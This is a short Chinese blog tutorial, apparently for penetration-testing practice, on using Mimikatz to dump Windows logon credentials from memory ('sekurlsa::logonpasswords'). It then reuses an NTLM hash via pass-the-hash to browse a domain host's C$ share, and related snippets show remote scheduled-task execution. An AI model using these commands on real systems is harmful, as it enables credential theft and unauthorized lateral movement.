mimikatz_trunk(猕猴桃)

于 2024-03-30 08:55:08 发布
阅读量502 收藏 6
点赞数 15
分类专栏: 工具使用 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73481504/article/details/137146712
版权

内网渗透

域渗透

简介

Mimikatz是一款由法国安全研究员Benjamin Delpy(网名为gentilkiwi)开发的工具,主要用于从Windows操作系统提取加密的密码和其他凭证信息。该工具最初设计用于安全测试和审计,帮助专业人员理解系统的安全状况,并发现潜在的安全漏洞。

Mimikatz的主要功能包括:

  1. 提取内存中的明文密码和加密的凭证,包括NTLM和LSA散列。
  2. 执行密码破解,通过暴力破解或者字典攻击获取密码。
  3. 提升进程权限,模拟具有更高权限的用户行为。
  4. 注入代码到其他进程中,实现远程代码执行。
  5. 模拟Kerberos认证,生成假冒的服务票据。
  6. 捕获网络流量,分析认证过程中的数据交换。

使用猕猴桃查看预控C盘,查看C盘文件内容

cmd以管理员方式执行选择猕猴桃路径并打开

privilege::debug

sekurlsa::logonpasswords获取内存中保存的登录信息

sekurlsa::pth /user:administrator /domain:xxxx.com /ntlm:xxxxxxxxxxxxxxxxx

dir查看 主机192.168.1.254的C盘内容

dir \\xxx.xxx.xxx.xxx\c$命令字 + 主机

Caliy_
关注
  • 15
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mimikatz抓取密码_mimikatz获取密码(1),复习指南
m0_60452070的博客
04-18 575
schtasks /create /s 192.168.139.128 /ru “SYSTEM” /tn mimika /sc DAILY /tr C:\mimika.bat /F #系统大于等于windows2012 创建mimika对应执行文件。schtasks /run /s 192.168.139.128 /tn mimika /i #运行mimika任务。echo 回车复制执行mimikatz脚本到目标并执行,耐心等待。echo 回车复制减压脚本到目标并执行,耐心等待。
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1092
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
mimikatz_trunk_20140417
10-15
mimikatz 是一款基于命令行的系统密码获取工具,对于丢失电脑密码的朋友有一定帮助,据说已经被集成在metasplo,需要一定电脑水平才可以使用
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1937
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
mimikatz2.0
06-25
在管理员权限下运行 privilege::debug sekurlsa::logonpasswords
Windows明文密码抓取 法国神器mimikatz_trunk附源码
热门推荐
浮生若梦的专栏
08-30 1万+
大家都知道的东西吧,渗透测试常用工具。尤其对社工密码收集来说必备的 法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。 mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdm
mimikatz_trunk
07-10
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
mimikatz工具
03-08
本工具可以提取存于windows电脑内存中的密码,安全无毒,最新版工具.
mimikatz_trunk.7z
12-08
"Mimikatz_trunk.7z" 是一个包含Mimikatz工具的压缩包,版本为2.2.0,主要用于渗透测试。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,它主要用于从Windows操作系统中提取明文密码、哈希值、 ...
mimikatz_trunk.zip
11-28
mimikatz_trunk.zip压缩包中的文件包括: 1. **mimicom.idl**:这是一个接口定义语言(IDL)文件,用于描述mimikatz的通信协议。它可能包含用于与其他程序或服务交互的接口定义,例如在远程操作或自动化脚本中使用...
mimikatz_trunk2.1.1.zip
08-03
标题中的"mimikatz_trunk2.1.1.zip"指的是mimikatz的一个历史版本,这个版本可能在Windows 10操作系统上仍然能够正常运行。本文将深入探讨mimikatz的功能、原理以及在Windows系统中的应用。 mimikatz是由法国安全...
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
获取Windows明文密码mimikatz_trunk_2.2.0_20190512.7z
07-07
Windows明文密码获取工具mimikatz_trunk_2.2.0_20190512.7z
mimikatz_trunk-1_mimikatz_
10-03
标题中的"mimikatz_trunk-1_mimikatz_"很可能是指mimikatz的一个版本或者分支,"trunk"通常是开发过程中的主分支,而数字"1"可能是版本号的一部分。这个压缩包可能包含了该版本的源代码、文档和不同平台的可执行文件...
mimikatz_trunk_lockpassword_
09-29
mimikatz_trunk_lockpassword_》是一个与网络安全密切相关的工具,主要涉及Windows系统中的密码获取和安全漏洞利用。Mimikatz是由法国安全研究员Benjamin Delpy开发的一款开源工具,它能够用于安全审计、漏洞分析...
利用mimikatz_trunk获取密码明文
主人,番茄要加鸡蛋
08-01 2340
解压缩mimikatz_trunk.zip会生成3个目录,tools、Win32、x64,看机器是32还是64位操作系统,运行x64中mimikatz.exe 650) this.width=650;" border="0" alt="" src="http://img1.51cto.com/attachment/201303/114605525.jpg" /> 输入privilege::de
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 2786
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
域渗透高权限读取本地密码
Longwaer
01-26 357
学习域环境高权限读取本地密码技术,更好的在内网环境中扩大战果。
介绍一下神器mimikatz,从lsass里抓密码
fengling132的专栏
05-08 3122
昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。 咪咪卡住的下载地址: http://blog.gentilkiwi.com/mimikatz mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取
mimikatz木马
最新发布
09-13
Mimikatz是一个知名的密码获取工具,它可以用于从Windows系统中提取敏感信息,如明文密码、哈希值和凭证等。由于其功能强大,Mimikatz也经常被黑客用作攻击工具,用于获取用户凭证并进行横向渗透。 值得注意的是,Mimikatz本身并不是一个木马程序,而是一个密码获取工具。然而,它的恶意使用方式可能会将其视为一种恶意软件。因此,在网络安全和保护个人隐私方面,我们都应该注意防范并采取相应的安全措施,例如定期更新操作系统和应用程序、使用强密码并定期更改、限制管理员权限等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值